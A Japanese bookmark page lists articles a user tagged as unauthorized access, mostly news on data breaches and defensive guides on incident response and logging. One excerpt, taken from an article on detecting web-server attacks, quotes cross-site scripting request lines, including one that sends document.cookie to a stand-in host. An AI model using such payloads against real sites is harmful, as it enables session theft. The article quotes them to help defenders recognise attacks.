タグ

不正アクセスに関するkaitonのブックマーク (16)

  • JTB子会社へのサイバー攻撃、インシデント対応で分かったことは?

    外部からの不正アクセスにより約793万人分の個人情報が漏えいした可能性がある。提携先のドコモユーザー33万人分の情報も含まれているという。 旅行会社大手のジェイティービー(JTB)は6月14日、グループ会社でネット販売を手掛けるi.JTBが不正アクセスを受け、約793万人分の個人情報が漏えいした可能性があると発表した。JTBと提携するNTTドコモも同日、同社ユーザー33万人分の情報が含まれていることを明らかにした。 JTBによると、不正アクセスの原因とみられる事象は3月15日に発生したという。取引先を装うメールの添付ファイルを開封してi.JTB内のPCがマルウェアに感染した。この時点で感染には気が付けなかったとしている。 その後、同月19日から24日にかけてi.JTB内のサーバから外部サーバへの不審な通信が複数検知された。発信元サーバは、来個人情報を保有していないという。JTBでは不審な

    JTB子会社へのサイバー攻撃、インシデント対応で分かったことは?
    kaiton
    kaiton 2016/06/15
    標的型メールで感染したPCを踏み台にサーバをクラックして個人情報を取得とか、映画のような話が現実に
  • 日本年金機構にサイバー攻撃、ファイル共有サーバーから125万件の年金情報が流出

    年金機構は2015年6月1日、サイバー攻撃により約125万件の年金情報が流出したと公表した。特定の企業や団体から機密情報を盗み出す標的型サイバー攻撃に遭ったと見られる。通常は基幹システムで管理する個人情報をファイル共有サーバーに移したところ、ウイルスに感染したパソコン経由で流出したという。 漏洩した情報は3種類。基礎年金番号と氏名を含む情報が約3.1万件。基礎年金番号と氏名と生年月日を含む情報が約116.7万件。基礎年金番号と氏名と生年月日、住所を含む情報が約5.2万件。流出した基礎年金番号は変更するという。 日年金機構のシステム統括部によれば、5月28日に警視庁から連絡があり事態が判明した。同機構は現時点で、流出した可能性のある最大件数や流出先を把握していない。 流出の原因は、職員がウイルスの仕込まれた添付ファイル付きのメールを受信した後、添付ファイルを開いて不正アクセスが実行され

    日本年金機構にサイバー攻撃、ファイル共有サーバーから125万件の年金情報が流出
    kaiton
    kaiton 2016/02/18
    こんな運用なところ多そう、一部の人だけに宛名シールとか?昔で言うEUC
  • 首都大のNASが踏み台に、スパム10万通送信 管理パスワード初期値のまま運用

    首都大学東京は2月2日、学内のNAS(ネットワーク接続ストレージ)が踏み台に悪用され、学外へ約10万通の迷惑メールを送っていたことが分かったと発表した。NASに格納していた個人情報への不正アクセスの形跡は確認していないが、流出の可能性は否定しきれないという。 同大学は1月19日に、学生や教員らのべ約5万1000人分の個人情報を保存したNASが外部に公開(FTP共有)された状態になっていたことで情報が流出した可能性があると発表したばかり。 同大の報告によると1月27日、南大沢キャンパス(東京都八王子市)内の社会福祉学教室が管理するNASから大量のスパムメールが送信されていることを、学術情報基盤センターが検知。すぐにNASをネットワークから切り離し、被害状況を調べたところ、同日午後3時6分から4時37分の約1時間半の間に約10万通送信されていたという。 NASはFTP共有を無効にしていたが、管

    首都大のNASが踏み台に、スパム10万通送信 管理パスワード初期値のまま運用
    kaiton
    kaiton 2015/02/05
    首都大はグローバルIPで公開がデフォなのかな?全て閉じて公開するものだけ開けるがかなり前から大学でも一般的と思うが?NASが自宅(つまり全世界)からも見えて良かったとでも思っていたのか?
  • 「GOM Player」によるウイルス感染、原因はアップデートサーバーへの不正アクセス

    グレテックジャパンは2014年1月24日、動画再生ソフト「GOM Player」を悪用したウイルス(マルウエア)感染の原因は、GOM Playerのアップデートサーバーへの不正アクセスであることを明らかにした。GOM Playerがアップデートサーバーにアクセスすると、攻撃者が用意した踏み台サイトに転送され、アップデートプログラムに見せかけたウイルスがダウンロードされたという。 セキュリティベンダーのラックは1月23日、GOM Playerのアップデートを実行すると、ウイルスに感染する恐れがあったことを報告。複数の国内企業において、感染が確認されたと発表した(関連記事:もんじゅウイルス混入の原因か? ラックが韓国製動画再生ソフトのアップデートでウイルス確認)。 ラックによると、GOM Playerが正規のアップデートサイト(app.gomlab.com)にアクセスすると、何らかの方法で攻撃

    「GOM Player」によるウイルス感染、原因はアップデートサーバーへの不正アクセス
    kaiton
    kaiton 2014/01/28
    Mac,iPhone等のApp StoreやAndroidのGoogle Playみたいな仕組みがWindowsにも早く一般化して欲しい
  • ヤフーID本部長 楠正憲氏が語る 「ID流出事故から得られた7つの教訓」

    約1兆2千億円の年間売上規模を持つYahoo! Japan(以下、ヤフー)。登録ID数は2013年9月現在で実に約2億以上、さらに日々万単位で増えつづけている。そうしたなか、同社では2013年4月、外部からの最初の不正アクセスを検知、さらに1か月後には最大で2200万件のID流出の可能性があることが発覚した。果たしてヤフーはどのような対策を取り、今後の教訓として何を得たのか。「サイバー犯罪時代のWebセキュリティ最前線」セミナーにて、ヤフーID部長の楠正憲氏が語った。 レッド オウル 編集&ライティング 1964年兵庫県生まれ。1989年早稲田大学理工学部卒業。89年4月、リクルートに入社。『月刊パッケージソフト』誌の広告制作ディレクター、FAX一斉同報サービス『FNX』の制作ディレクターを経て、94年7月、株式会社タスク・システムプロモーションに入社。広告制作ディレクター、Webコンテ

    ヤフーID本部長 楠正憲氏が語る 「ID流出事故から得られた7つの教訓」
  • 国内のインターネットバンキングで不正アクセスが相次いでいる問題について:IPA 独立行政法人 情報処理推進機構

    第11-29-227号 最終更新日:2011年8月3日 独立行政法人情報処理推進機構 技術セキュリティセンター(IPA/ISEC) 2011年6月下旬以降、日国内のインターネットバンキングにおいて、不正アクセスの被害件数が増加しています。現在、地方銀行を中心に20件以上の注意喚起が行われています。それらによると、不正アクセスに使われている手口は不審メールやスパイウェアによるものであり、これによりパスワードなどの顧客情報を不正に窃取され、実際に振込被害が発生しているという状況です。 インターネットを利用する際は、「セキュリティパッチを定期的に適用する」、「極力新しいバージョンのソフトウェアを使用する」、「不審なサイトや心あたりのないメールは開封しない」などの利用上の注意事項を常に心がける必要があります。さらに、インターネットサービスを利用する上で大事な鍵となるパスワードをいかに保護し

    kaiton
    kaiton 2011/08/04
    IPAからもでたか!! パスワードを強化しても、マルウェアに感染していたらどうしようもないね。
  • [スクープ]日本全国の銀行ネットバンクで不正アクセスが相次ぐ

    日経コンピュータの独自取材によって、地方銀行など複数の銀行のインターネットバンキングシステムで不正アクセスの被害が発生していることが分かった。6月後半以降、ネットバンキングの利用者のログインIDやパスワード、口座番号といった情報が漏洩し、第三者による不正な預金の引き出しや振り込みが相次いでいる。 銀行やネットバンキングのサービスを提供するITベンダーなどが実態の調査に乗り出しているが、被害件数などは8月3日時点では明らかになっていない。地銀、ネット銀行、信用金庫、大手銀行など多くの金融機関に影響が及んでいるもようだ。 近畿地方のある地銀は、7月14日付で「インターネットバンキング不正利用のご注意」と題して、利用者に注意を促す文章をWebサイトに掲載。「スパイウエアや金融機関を装った不審なメールにより、顧客のパスワードなどを盗み取り、不正な振り込みが行われる事件が発生して問題となっている」と

    [スクープ]日本全国の銀行ネットバンクで不正アクセスが相次ぐ
    kaiton
    kaiton 2011/08/04
    日本でも起こるということと、正しい対処法が広まればいいけれど、銀行など提供側と利用者の両方に/6年前の記事 http://p.tl/CHgt を思い出した。こういうサービスは使っていないけれど、サービス提供側はあまり進化してい
  • 日経BP

    株式会社 日経BP 〒105-8308 東京都港区虎ノ門4丁目3番12号 →GoogleMapでみる <最寄り駅> 東京メトロ日比谷線「神谷町駅」4b出口より徒歩5分 東京メトロ南北線 「六木一丁目駅」泉ガーデン出口より徒歩7分

    日経BP
  • 不正アクセス:和歌山の小6女児を補導 徳島県警 - 毎日jp(毎日新聞)

    徳島県警徳島東署は18日までに、和歌山県橋市の小学6年の女児(12)を不正アクセス禁止法違反の疑いで補導した。 同署によると、女児は昨年10月、徳島市内の中学3年の女子生徒(15)のIDとパスワードで1回、オンラインゲーム「ハンゲーム」に不正アクセスしたとされる。女児は「コインの増やし方を教える」などとゲーム内のチャットで持ちかけ、IDとパスワードを入手。自宅パソコンでゲームにアクセスし、ゲーム内でキャラクターが所有するアイテム(服3点、約2000円相当)を自分の物にしていた。このオンラインゲームは、会員登録は無料だがアイテムは購入するシステムになっている。【山健太】

    kaiton
    kaiton 2010/02/19
    そういうことが悪いことと理解できているのかな?? マナー教育というか、親・学校共に遅れている印象
  • 不正アクセスを知ったのは「警察からの連絡」が73% - ワークスタイル - nikkei BPnet

    不正アクセスを知ったのは「警察からの連絡」が73% (須藤 慎一=ライター) 警察庁は、2008年8月22日に「平成20年度警察白書」を閣議に報告した(9月1日段階では文は未掲載、図表のみ見られる)。 不正アクセスの被害に遭ったことを知ったきっかけに注目だ(不正アクセス行為の認知の端緒)。被害者の73%が、警察からの連絡で初めて知ったという。 被害に遭っても気がつかないのは、被害者だけに原因があるのではない。Webサービスやプロバイダーなどが、「気付き」の仕組みを提供していないのが原因だろう。 警察白書からIT犯罪の実態を読み取る 警察白書によると、平成19年度に警察が認知した不正アクセスの件数は1818件、検挙件数は1438件だった。 不正アクセスを知ったきっかけは、1位が「警察活動」で1326件(不正アクセス件数の73%、以下同様)、2位が「利用権者からの届出」で415

    kaiton
    kaiton 2008/09/02
    →と併せて読むと難しい面も多いけれど、何とか自分でわかるようにしないと.. http://itpro.nikkeibp.co.jp/article/COLUMN/20080528/304382/
  • Webサーバへの攻撃を見抜く

    GET /sample.cgi?language=ja&country=JP &page=<script>alert('foo')</script> HTTP/1.1 GET /cgi-bin/sample.cgi?A=execute&U=&CF=search-simple &nv=ie&S=%3Cscript%3Ealert%28%22test%22%29%3B%3C%2F script%3E&So=RDATE&Sp=AND GET /cgi-bin/sample.cgi?doc=<%73cr%69pt>document.location= ('http://example.com/test.php?c='+document.cookie)<%2f%73 %63%72%69%70t> sample.cgiはWebフォームで、入力された文字に対して全くチェックを行っていない脆弱なcgiとす

    Webサーバへの攻撃を見抜く
  • 情報収集の手法(1) --- スキャン

    ポイント ●スキャン(scan)とは,ターゲットとするネットワークや機器に対して調査を行い,脆弱な個所を探す手法の総称である ●セキュリティ・スキャナ(脆弱性検査ツール)を利用することにより,サイトの脆弱性を調査できる ●脆弱性検査は,調査のために大量のパケットを送信する。これらパケットは攻撃と捉えられたりするため,検査実施時はあらかじめ日時や実施内容を関係者や利用者に通知しておく必要がある 今回から,「第4章 脅威と攻撃手法」に入ります。脅威とは「情報資産に損害を与える可能性のある事象」のことです。ただし,守る側からしてみれば「脅威」でも,悪意のある側,つまり攻める側からしてみれば「攻撃の手法」ということになります。この章では,さまざまな攻撃手法について勉強していきます。 なお,「攻撃手法」と一言でいってもいろいろとあります。それぞれの手法は必ずしも以下の通りのカテゴリに当てはまるとは限

    情報収集の手法(1) --- スキャン
  • 会社におけるログの重要性を考える―捜査技術の第5条「情報収集がターゲットを絞り込ませる」―

    会社におけるログの重要性を考える―捜査技術の第5条「情報収集がターゲットを絞り込ませる」―:ビジネス刑事の捜査技術(10)(1/3 ページ) 警察活動において、最重要とされる「警ら活動」が民間ではあまり重視されていない。これはなぜだろうか。今回は、捜査の技術第5条「足元を固める情報収集活動がターゲット像を絞り込ませる」について、警ら活動とログの話を中心に考える。 筆者が警察組織を辞めてコンサルタント会社に勤め始めたとき、自社内の仕事を警察の仕事に置き換えて理解しようとしていた。例えば、営業は捜査に、製造はサービスを企画・設計するという意味で企画、購買は調達、総務は総務、人事労務は警務・教養、経理は会計といった感じで置き換えてみた。 特に「顧客を捜し出す営業」のような仕事には捜査の技術が役に立つ、ということに筆者は早くから気が付いていた。そんな中で、不思議だったのが警察活動の基礎ともいうべき

    会社におけるログの重要性を考える―捜査技術の第5条「情報収集がターゲットを絞り込ませる」―
  • 「危ない部下」への対処法(前編) / SAFETY JAPAN [特集] / 日経BP社

    「危ない部下」は会社に巣い、悪行を犯して会社をダメにしてしまう。にもかかわらず、どこに潜んでいるのか分からない。やっかいな存在だ。 例えばある会社で、「デキる」と評判だった社員は、課長への昇進で同期に先を越されたことに動揺した揚げ句、上司や会社に対する復讐(ふくしゅう)心に燃え、取引先に怪文書を流し始めた。 「普通」と思われていた社員が、ちょっとした気の迷いからか、会社のサーバーに不正なアクセスを繰り返して逮捕され、会社の信用を傷付けた。 また、ある会社の「未熟な社員」は、経営者が言ったことを十分に理解せぬまま無気力な姿勢でチームワークを乱し続ける。 経営者は、大切な社員をこうした「危ない部下」にしないために、何ができるだろうか。また社長は「危ない部下」を見つけ出し、立ち直らせるために、どう対処すべきだろうか。

  • 2006-09-10

    ITProの「今週のSecurity Check(第176回)」という記事を読んで、揮発性の順序やコマンドが人によって違うもんだなぁと改めて思ったのでちょっとメモしてみたり。 「Windowsマシンへの不正アクセスを発見」---そのとき,どうする? Windowsにおける証拠保全の具体的手順 http://itpro.nikkeibp.co.jp/article/COLUMN/20060831/246898/?ST=security 揮発性情報と、揮発性情報の取得を行う際の順序については、上記記事でも紹介されている RFC 3227 証拠収集とアーカイビングのためのガイドライン、に記述されています。 揮発性の高い情報、つまり時間の経過と共に消えていく情報に対して、情報が消える前に情報を取得しなければいけないので、その順序は消えやすいものから優先してということですやね。 題とはずれるんです

    2006-09-10
  • 「Windowsマシンへの不正アクセスを発見」---そのとき,どうする?

    Windowsマシンへの不正アクセスを発見」---そのとき,どうする? Windowsにおける証拠保全の具体的手順 自分が管理するシステムにおいて不正アクセスを見つけた場合,まずなすべきことは証拠保全である。影響範囲や原因を特定するためには,その時点でのシステムの状態をきちんと記録/保存しておかなければならない。 証拠保全の手順などについては,インターネット上で関連する情報を見つけられるし,関連書籍も複数発刊されている。しかしながら,具体的な作業例はUNIX系のOSについて書かれているものがほとんどで,Windows OSについてはあまり情報がない。特に,日語で書かれた情報はほとんど見かけない。 そこで稿では,Windowsマシン上で不正アクセスが見つかった場合の対処法を紹介したい。特に,失われやすい情報(揮発性の高いデータ)の証拠保全に焦点を絞って順を追って解説する。揮発性の高いデ

    「Windowsマシンへの不正アクセスを発見」---そのとき,どうする?
  • 1